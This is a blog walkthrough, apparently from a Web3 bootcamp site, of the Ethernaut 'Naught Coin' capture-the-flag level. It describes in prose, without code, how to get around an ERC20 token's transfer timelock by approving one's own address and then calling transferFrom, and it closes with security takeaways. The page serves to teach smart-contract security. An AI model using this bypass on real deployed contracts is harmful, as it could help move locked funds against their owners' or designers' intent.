Skip links

Table of Contents

Ethernaut Level 15 Walkthrough: Naught Coin

Ethernaut Level 15, “Naught Coin,” throws you headfirst into the world of ERC20 tokens and their potential vulnerabilities. This challenge presents a seemingly locked contract with a 10-year transfer lock on your own token balance. But fear not, intrepid hacker (for educational purposes only!), there’s a way to bypass this lock. Here’s a walkthrough on how to conquer Level 15 and the key takeaways you’ll gain.

Understanding the Challenge:

Upon entering Ethernaut Level 15, you’ll be presented with a deployed Naught Coin contract. This contract inherits the standard ERC20 functionality, allowing you to view your token balance but preventing any transfers due to the built-in timelock. The objective? Find a way to bypass the lock and transfer your tokens out of the contract.

Ethernaut Level 15 Naught Coin Walkthrough - Solidity code and console output for solving the Ethernaut challenge. The image shows steps and commands used to tackle the Naught Coin challenge in the Ethernaut game.

The Exploit: Abusing Approvals

The key to cracking the Naught Coin vault lies in understanding the approve function within the ERC20 standard. This function allows users to grant permission to another address (called a spender) to transfer a specific amount of tokens on their behalf.

The vulnerability in this challenge stems from the way the Naught Coin contract interacts with the timelock. While the transfer function is restricted, the approvefunction doesn’t have the same limitations. This creates an opportunity for exploitation of the transferFrom  function.

The Walkthrough:

  1. Check Your Balance: Use the console to create a new constant: player and to view your initial token balance in the Naught Coin contract: 
  1. Copy the contract into Remix IDE and replace the import with this URL: https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC20/ERC20.sol
  1. Compile the code and go to the deploy section, make sure to select Injected Provider – MetaMask as environment. Then copy the instance address in the “At address” field to deploy the contract at that address.
  1. Check the player function to see if it’s match your address and check the balance as well.
  1. Approve Your Own Address: Here comes the clever part. Use the approve function to grant your own address permission to transfer your entire token balance. In essence, you’re approving yourself to move your own tokens.
  1. Transfer Using transferFrom: Now, here’s the twist. Instead of using the transfer function (which is locked), leverage the transferFrom function. This function allows an approved spender (which is your address in this case) to transfer tokens on behalf of the owner (also your address). 

Go to etherscan find a random address and enter it in the “To” address in the transferFrom function. Then transfer the tokens to that address.

  1. Check the your balance it should be reduced to 0
  1. Finally submit the instance. Congratulations you passed this level

By cleverly using transferFrom with your own address as both the spender and the owner, you can bypass the timelock and transfer your entire token balance out of the contract, effectively “draining” it.

Conclusion:

By exploiting the mismatch between the locked transfer function and the unrestricted approve function, you’ve successfully bypassed the timelock and transferred your tokens in the Ethernaut Level 15 challenge. This walkthrough of the Ethernaut challenge highlights the importance of careful contract design and security audits within the DeFi space. Approaching unfamiliar tokens, especially those with custom logic or odd functionalities, requires extra caution.

faq

FAQs:

Is this a vulnerability in all ERC20 tokens?

  • No, not necessarily. This exploit relies on a specific design flaw in the Naught Coin contract. Well-written ERC20 contracts should have proper access control mechanisms to prevent such abuses.

What are the takeaways from this challenge?

  • This challenge emphasizes the importance of understanding ERC20 token standards and potential vulnerabilities associated with approvals. It also highlights the need for thorough contract audits before deployment in DeFi.

Can I get my tokens back after draining them?

  • Unfortunately, no. Once you transfer your tokens out, they’re gone from the Naught Coin contract. This is why it’s crucial to only use such exploits in educational settings and never on real contracts with your funds.

Are there other ways to solve this challenge?

  • While the approve and transferFrom approach is a common solution, there might be alternative ways to exploit the contract’s logic depending on its specific implementation.

What’s next on my Ethernaut journey?

  • Ethernaut offers a variety of challenges with increasing difficulty. Keep exploring to learn more about smart contract vulnerabilities and how to write secure code for the blockchain!

Metana Guarantees a Job 💼

Plus Risk Free 2-Week Refund Policy ✨

You’re guaranteed a new job in web3—or you’ll get a full tuition refund. We also offer a hassle-free two-week refund policy. If you’re not satisfied with your purchase for any reason, you can request a refund, no questions asked.

Web3 Solidity Bootcamp

The most advanced Solidity curriculum on the internet!

Full Stack Web3 Beginner Bootcamp

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

You may also like

Metana Guarantees a Job 💼

Plus Risk Free 2-Week Refund Policy

You’re guaranteed a new job in web3—or you’ll get a full tuition refund. We also offer a hassle-free two-week refund policy. If you’re not satisfied with your purchase for any reason, you can request a refund, no questions asked.

Web3 Solidity Bootcamp

The most advanced Solidity curriculum on the internet

Full Stack Web3 Beginner Bootcamp

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

Events by Metana

Dive into the exciting world of Web3 with us as we explore cutting-edge technical topics, provide valuable insights into the job market landscape, and offer guidance on securing lucrative positions in Web3.

Start Your Application

Secure your spot now. Spots are limited, and we accept qualified applicants on a first come, first served basis..

Career Track(Required)

The application is free and takes just 3 minutes to complete.

What is included in the course?

Expert-curated curriculum

Weekly 1:1 video calls with your mentor

Weekly group mentoring calls

On-demand mentor support

Portfolio reviews by Design hiring managers

Resume & LinkedIn profile reviews

Active online student community

1:1 and group career coaching calls

Access to our employer network

Job Guarantee